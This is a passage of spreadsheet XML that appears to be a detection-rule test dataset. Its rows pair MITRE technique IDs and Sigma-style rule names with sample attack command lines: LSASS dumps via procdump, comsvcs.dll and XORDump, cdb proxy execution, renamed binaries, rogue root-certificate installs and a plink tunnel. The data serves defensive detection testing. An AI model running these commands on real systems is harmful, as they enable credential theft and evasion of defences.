      <c r="G2407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2407" s="43" t="n"/>
      <c r="J2407" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2407" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2408" ht="15.75" customHeight="1" s="42">
      <c r="A2408" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2408" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_break_process_tree</t>
        </is>
      </c>
      <c r="C2408" s="43" t="inlineStr">
        <is>
          <t>Explorer Process Tree Break</t>
        </is>
      </c>
      <c r="D2408" s="43" t="inlineStr">
        <is>
          <t>949f1ffb-6e85-4f00-ae1e-c3c5b190d605</t>
        </is>
      </c>
      <c r="E2408" s="43" t="inlineStr">
        <is>
          <t>explorer.exe /root\,calc.exe</t>
        </is>
      </c>
      <c r="F2408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2408" s="43" t="n"/>
      <c r="J2408" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2408" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2409" ht="15.75" customHeight="1" s="42">
      <c r="A2409" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2409" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lnk</t>
        </is>
      </c>
      <c r="C2409" s="43" t="inlineStr">
        <is>
          <t>Findstr Launching .lnk File</t>
        </is>
      </c>
      <c r="D2409" s="43" t="inlineStr">
        <is>
          <t>33339be3-148b-4e16-af56-ad16ec6c7e7b</t>
        </is>
      </c>
      <c r="E2409" s="43" t="inlineStr">
        <is>
          <t>findstr "search_string" C:\temp\malicious.lnk</t>
        </is>
      </c>
      <c r="F2409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2409" s="43" t="n"/>
      <c r="J2409" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2409" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2410" ht="15.75" customHeight="1" s="42">
      <c r="A2410" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2410" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lnk</t>
        </is>
      </c>
      <c r="C2410" s="43" t="inlineStr">
        <is>
          <t>Findstr Launching .lnk File</t>
        </is>
      </c>
      <c r="D2410" s="43" t="inlineStr">
        <is>
          <t>33339be3-148b-4e16-af56-ad16ec6c7e7b</t>
        </is>
      </c>
      <c r="E2410" s="43" t="inlineStr">
        <is>
          <t>findstr "search_string" C:\temp\malicious.lnk C:\Windows\win.ini</t>
        </is>
      </c>
      <c r="F2410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2410" s="43" t="n"/>
      <c r="J2410" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2410" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2411" ht="15.75" customHeight="1" s="42">
      <c r="A2411" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2411" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_xordump</t>
        </is>
      </c>
      <c r="C2411" s="43" t="inlineStr">
        <is>
          <t>HackTool - XORDump Execution</t>
        </is>
      </c>
      <c r="D2411" s="43" t="inlineStr">
        <is>
          <t>66e563f9-1cbd-4a22-a957-d8b7c0f44372</t>
        </is>
      </c>
      <c r="E2411" s="43" t="inlineStr">
        <is>
          <t>"C:\\Windows\\Temp\\xordump.exe" -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41 -process lsass.exe</t>
        </is>
      </c>
      <c r="F2411" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2411" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2411" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2411" s="43" t="n"/>
      <c r="J2411" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2411" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2412" ht="15.75" customHeight="1" s="42">
      <c r="A2412" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2412" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_xordump</t>
        </is>
      </c>
      <c r="C2412" s="43" t="inlineStr">
        <is>
          <t>HackTool - XORDump Execution</t>
        </is>
      </c>
      <c r="D2412" s="43" t="inlineStr">
        <is>
          <t>66e563f9-1cbd-4a22-a957-d8b7c0f44372</t>
        </is>
      </c>
      <c r="E2412" s="43" t="inlineStr">
        <is>
          <t>"C:\\Windows\\Temp\\xordump.exe" -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41 -process "lsass.exe" -m "comsvcs"</t>
        </is>
      </c>
      <c r="F2412" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2412" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2412" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2412" s="43" t="n"/>
      <c r="J2412" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2412" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2413" ht="15.75" customHeight="1" s="42">
      <c r="A2413" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2413" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mode_codepage_russian</t>
        </is>
      </c>
      <c r="C2413" s="43" t="inlineStr">
        <is>
          <t>CodePage Modification Via MODE.COM To Russian Language</t>
        </is>
      </c>
      <c r="D2413" s="43" t="inlineStr">
        <is>
          <t>12fbff88-16b5-4b42-9754-cd001a789fb3</t>
        </is>
      </c>
      <c r="E2413" s="43" t="inlineStr">
        <is>
          <t>mode con cp select=\1251</t>
        </is>
      </c>
      <c r="F2413" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2413" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2413" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2413" s="43" t="n"/>
      <c r="J2413" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2413" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2414" ht="15.75" customHeight="1" s="42">
      <c r="A2414" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2414" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mode_codepage_russian</t>
        </is>
      </c>
      <c r="C2414" s="43" t="inlineStr">
        <is>
          <t>CodePage Modification Via MODE.COM To Russian Language</t>
        </is>
      </c>
      <c r="D2414" s="43" t="inlineStr">
        <is>
          <t>12fbff88-16b5-4b42-9754-cd001a789fb3</t>
        </is>
      </c>
      <c r="E2414" s="43" t="inlineStr">
        <is>
          <t>mode con cp select= 1251</t>
        </is>
      </c>
      <c r="F2414" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2414" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2414" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2414" s="43" t="n"/>
      <c r="J2414" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2414" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2415" ht="15.75" customHeight="1" s="42">
      <c r="A2415" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2415" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C2415" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D2415" s="43" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E2415" s="43" t="inlineStr">
        <is>
          <t>createdump.exe -f /tmp/test.dmp -u 632</t>
        </is>
      </c>
      <c r="F2415" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2415" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2415" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2415" s="43" t="n"/>
      <c r="J2415" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2415" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2416" ht="15.75" customHeight="1" s="42">
      <c r="A2416" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2416" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C2416" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D2416" s="43" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E2416" s="43" t="inlineStr">
        <is>
          <t>createdump.exe -u -f /tmp/test.dmp 632</t>
        </is>
      </c>
      <c r="F2416" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2416" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2416" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2416" s="43" t="n"/>
      <c r="J2416" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2416" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2417" ht="15.75" customHeight="1" s="42">
      <c r="A2417" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2417" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C2417" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D2417" s="43" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E2417" s="43" t="inlineStr">
        <is>
          <t>createdump.exe --name /tmp/test.dmp --full 632</t>
        </is>
      </c>
      <c r="F2417" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2417" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2417" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2417" s="43" t="n"/>
      <c r="J2417" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2417" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2418" ht="15.75" customHeight="1" s="42">
      <c r="A2418" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2418" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C2418" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D2418" s="43" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E2418" s="43" t="inlineStr">
        <is>
          <t>createdump.exe -f "/tmp/test.dmp" -u 632</t>
        </is>
      </c>
      <c r="F2418" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2418" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2418" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2418" s="43" t="n"/>
      <c r="J2418" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2418" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2419" ht="15.75" customHeight="1" s="42">
      <c r="A2419" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2419" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C2419" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D2419" s="43" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E2419" s="43" t="inlineStr">
        <is>
          <t>createdump.exe -f /tmp/test.dmp\  -u 632</t>
        </is>
      </c>
      <c r="F2419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2419" s="43" t="n"/>
      <c r="J2419" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2419" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2420" ht="15.75" customHeight="1" s="42">
      <c r="A2420" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2420" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_plink</t>
        </is>
      </c>
      <c r="C2420" s="43" t="inlineStr">
        <is>
          <t>Renamed Plink Execution</t>
        </is>
      </c>
      <c r="D2420" s="43" t="inlineStr">
        <is>
          <t>1c12727d-02bf-45ff-a9f3-d49806a3cf43</t>
        </is>
      </c>
      <c r="E2420" s="43" t="inlineStr">
        <is>
          <t>plink.exe -lforward -P 22 -R 127.0.0.1:8080:localhost:80</t>
        </is>
      </c>
      <c r="F2420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2420" s="43" t="n"/>
      <c r="J2420" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2420" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2421" ht="15.75" customHeight="1" s="42">
      <c r="A2421" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2421" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C2421" s="43" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D2421" s="43" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E2421" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" C:\windows\System32\comsvcs.dll,MiniDump 204 "C:\Users\thaim\AppData\Local\Temp\svchost-exe.dmp" full</t>
        </is>
      </c>
      <c r="F2421" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2421" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2421" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2421" s="43" t="n"/>
      <c r="J2421" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2421" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2422" ht="15.75" customHeight="1" s="42">
      <c r="A2422" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2422" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C2422" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D2422" s="43" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E2422" s="43" t="inlineStr">
        <is>
          <t>procdump.exe  -ma   lsass.exe</t>
        </is>
      </c>
      <c r="F2422" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2422" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2422" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2422" s="43" t="n"/>
      <c r="J2422" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2422" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2423" ht="15.75" customHeight="1" s="42">
      <c r="A2423" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2423" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C2423" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D2423" s="43" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E2423" s="43" t="inlineStr">
        <is>
          <t>procdump.exe -ma lsass.exe</t>
        </is>
      </c>
      <c r="F2423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2423" s="43" t="n"/>
      <c r="J2423" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2423" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2424" ht="15.75" customHeight="1" s="42">
      <c r="A2424" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2424" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C2424" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D2424" s="43" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E2424" s="43" t="inlineStr">
        <is>
          <t>procdump.exe -ma "lsass.exe"</t>
        </is>
      </c>
      <c r="F2424" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2424" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2424" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2424" s="43" t="n"/>
      <c r="J2424" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2424" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2425" ht="15.75" customHeight="1" s="42">
      <c r="A2425" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B2425" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C2425" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D2425" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E2425" s="43" t="inlineStr">
        <is>
          <t>cdb.exe -cf script.txt</t>
        </is>
      </c>
      <c r="F2425" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2425" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2425" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2425" s="43" t="n"/>
      <c r="J2425" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2425" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2426" ht="15.75" customHeight="1" s="42">
      <c r="A2426" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B2426" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C2426" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D2426" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E2426" s="43" t="inlineStr">
        <is>
          <t>copy cdb.exe not_a_debugger.exe &amp;&amp; not_a_debugger.exe -cf script.txt</t>
        </is>
      </c>
      <c r="F2426" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2426" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2426" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2426" s="43" t="n"/>
      <c r="J2426" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2426" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2427" ht="15.75" customHeight="1" s="42">
      <c r="A2427" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B2427" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C2427" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D2427" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E2427" s="43" t="inlineStr">
        <is>
          <t>cdb.exe -command "!shell calc.exe"</t>
        </is>
      </c>
      <c r="F2427" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2427" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2427" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2427" s="43" t="n"/>
      <c r="J2427" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2427" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2428" ht="15.75" customHeight="1" s="42">
      <c r="A2428" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B2428" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C2428" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D2428" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E2428" s="43" t="inlineStr">
        <is>
          <t>cdb.exe -lines 10 -cf C:\path\to\script.txt calc.exe</t>
        </is>
      </c>
      <c r="F2428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2428" s="43" t="n"/>
      <c r="J2428" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2428" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2429" ht="15.75" customHeight="1" s="42">
      <c r="A2429" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B2429" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C2429" s="43" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D2429" s="43" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E2429" s="43" t="inlineStr">
        <is>
          <t>copy cdb.exe not_cdb.exe &amp;&amp; not_cdb.exe -c</t>
        </is>
      </c>
      <c r="F2429" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2429" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2429" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2429" s="43" t="n"/>
      <c r="J2429" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2429" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2430" ht="15.75" customHeight="1" s="42">
      <c r="A2430" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B2430" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C2430" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D2430" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E2430" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\Temp &amp;&amp; tmp.bat"</t>
        </is>
      </c>
      <c r="F2430" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2430" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2430" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2430" s="43" t="n"/>
      <c r="J2430" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2430" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2431" ht="15.75" customHeight="1" s="42">
      <c r="A2431" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B2431" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C2431" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D2431" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E2431" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe renamed_payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F2431" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2431" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2431" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2431" s="43" t="n"/>
      <c r="J2431" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2431" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2432" ht="15.75" customHeight="1" s="42">
      <c r="A2432" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B2432" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C2432" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D2432" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E2432" s="43" t="inlineStr">
        <is>
          <t>copy rundll32.exe worker.exe &amp;&amp; worker.exe renamed_payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F2432" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2432" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2432" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2432" s="43" t="n"/>
      <c r="J2432" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2432" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2433" ht="15.75" customHeight="1" s="42">
      <c r="A2433" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B2433" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C2433" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D2433" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E2433" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c t^m^p.bat</t>
        </is>
      </c>
      <c r="F2433" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2433" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2433" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2433" s="43" t="n"/>
      <c r="J2433" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2433" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2434" ht="15.75" customHeight="1" s="42">
      <c r="A2434" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2434" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certmgr_certificate_installation</t>
        </is>
      </c>
      <c r="C2434" s="43" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via CertMgr.EXE</t>
        </is>
      </c>
      <c r="D2434" s="43" t="inlineStr">
        <is>
          <t>ff992eac-6449-4c60-8c1d-91c9722a1d48</t>
        </is>
      </c>
      <c r="E2434" s="43" t="inlineStr">
        <is>
          <t>CertMgr.exe -add CertificateFileName.cer /s /r localMachine root /all</t>
        </is>
      </c>
      <c r="F2434" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2434" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2434" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2434" s="43" t="n"/>
      <c r="J2434" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2434" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2435" ht="15.75" customHeight="1" s="42">
      <c r="A2435" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2435" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_certificate_installation</t>
        </is>
      </c>
      <c r="C2435" s="43" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2435" s="43" t="inlineStr">
        <is>
          <t>d2125259-ddea-4c1c-9c22-977eb5b29cf0</t>
        </is>
      </c>
      <c r="E2435" s="43" t="inlineStr">
        <is>
          <t>certutil -addstore -user root C:\Temp\cert.cer</t>
        </is>
      </c>
      <c r="F2435" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2435" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2435" s="43" t="b">
        <v>0</v>
      </c>
